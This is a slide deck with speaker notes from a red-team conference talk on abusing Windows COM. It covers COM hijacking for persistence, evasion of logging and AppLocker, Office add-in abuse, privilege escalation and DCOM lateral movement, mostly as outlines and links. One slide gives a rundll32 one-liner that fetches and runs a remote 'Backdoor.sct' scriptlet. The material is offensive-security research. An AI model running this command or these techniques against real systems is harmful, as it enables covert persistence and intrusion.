Windows Operating System Archaeology
- 2. Who Are We?
- Casey Smith (@subTee)
- Mandiant Red Team
- subt0x10.blogspot.com
- Matt Nelson (@enigma0x3)
- Operator and Security Researcher at SpecterOps
- enigma0x3.net
- 3. Objectives For This Talk
Foster curiosity & further research
Provide references
Call attention to the attack surface and capabilities
- 4. What Will We Discuss?
COM Overview
COM Research Methodology
Malicious COM Tactics
- 6. COM Architecture and History - in 2 minutes ;-)
What are COM components?
COM components are cross-language classes backed by:
DLL (Dynamic-Link Libraries)
OCX (ActiveX controls)
TLB (Type Libraries )
EXE (Executables)
SCT ( XML files )
Location Transparency Principle
- 7. Example - COM Scriptlet XML
XML Files - We use these for POC examples
Registration Block
- 8. COM Object Type Registration
To find a component when a program needs it,
it is USUALLY registered
What Registry keys are related to COM object registration?
HKLM
+ HKCU
HKCR
- 9. What registry entries are needed to register a COM object?
https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries-
are-needed-to-register-a-com-object/
Also XRef:
Minimal COM object registration
https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object-
registration/
- 10. COM Object Type Resolution
CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC}
ProgID - String
Monikers - “scriptlet:http://example.com/file.sct”
GetObject - CreateObject Methods
rundll32.exe javascript:"..mshtml,RunHTMLApplication
";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close();
- 15. What does all this mean?
COM Artifacts and details can be found in the registry.
Usually...
- 22. In Memory Assembly Execution JScript/VBScript
https://github.com/tyranid/DotNetToJScript
This is Amazing!
Executes a .NET assembly IN JSCRIPT
This dramatically extends capabilities of COM Scriptlets
No Dll On Disk.
Works for .NET 2 and 3.5 Only
- 26. Excavation Tools
James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet
Mark Russonovich - ProcMon - https://technet.microsoft.com/en-
us/sysinternals/processmonitor
RPCView - http://rpcview.org
API Spy - http://www.rohitab.com/apimonitor
- 28. Persistence via COM Hijacking
Leveraging Per-User COM Objects, we can divert resolution to an object under
our control.
Registry Only Persistence
“TreatAs” hijack
COM handler hijacking (scheduled tasks)
https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx
https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg
https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and-
com-handler-hijacking/
- 31. Evasion
Windows very often resolves COM objects via the HKCU hive first
Find your favorite script that implements GetObject() or CreateObject() and hijack it.
This allows you to instantiate your own code without exposing it via the command
line.
- 34. Example: Evade Command Line Logging
slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to
make it run your code
- 37. This is also a clever way to bypass AppLocker ;-)
Winrm.vbs
- 39. Malicious Office Add-ins
Outlook, Excel etc.
Rich API for persistence and C2
https://twitter.com/JohnLaTwC/status/836259629277421568
Outlook Rules Added Via COM Object
https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4
https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- 40. Privilege Escalation
The COM Elevation Moniker - Resources
-Execute Process in Another user’s session
-Think Terminal Server or RDP etc…
- 43. Lateral Movement
- Leveraging DCOM objects with no explicit access or launch permissions set
- Certain objects have interesting methods…
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-
com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
- 46. Hopeful outcomes of this talk.
Foster curiosity & further research
Provide references
Call attention to the attack surface and capabilities
- 47. Closing Thoughts / Conclusions / Thanks
Special Thanks to:
David Mcguire & Jason Frank for their support of this research while we were
working for them.
James Forshaw - For answering our questions and COM research
All of the former ATD members who provided feedback and improvements to our
research!
Editor's Notes
- Casey
- Casey/Matt
- Casey
- Casey
- Casey
- Casey
https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf
https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf
COM Specification:
http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf
Windows COM Dependency/History/Origins
James Forshaw’s talk at Troopers and Infiltrate
- Casey
Necessary For GetObject
- Casey
AppID, CLSID
Explain HKCR vs hkcu/hklm
- Casey
- Casey
https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/
Be sure to reference script:http for Matt’s malicious demos
- Casey
Importance Of GetObject
- Casey
- Casey
From COM Specification
- Casey
- Casey
- Casey
- Casey
- Casey
(maybe add arrows)
- Casey
- Matt
Resolution fails as well
- Matt
(reference treatas)
- Casey/Matt
- Matt
- Matt
http://www.nobunkum.ru/analytics/en-com-hijacking
https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
https://attack.mitre.org/wiki/Technique/T1122
- Matt
- Matt
- Matt
- Matt
- Matt
Source Code of pubprn.vbs
Injectable args(1)
- Matt
- Matt
Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic!
- Matt
- Matt
- Matt
- Matt
- Casey
https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker
https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP
Reference Julian n0pe_sleds write up once posted on using this trick to get DA.
http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
- Casey
https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285
http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session.To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching.The update addresses the vulnerability by correcting how Helppane.exe authenticates the client.The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list:Vulnerability titleCVE numberPublicly disclosedExploitedWindows HelpPane Elevation of Privilege VulnerabilityCVE-2017-0100NoNo
- Casey
- Matt
- Matt
- Matt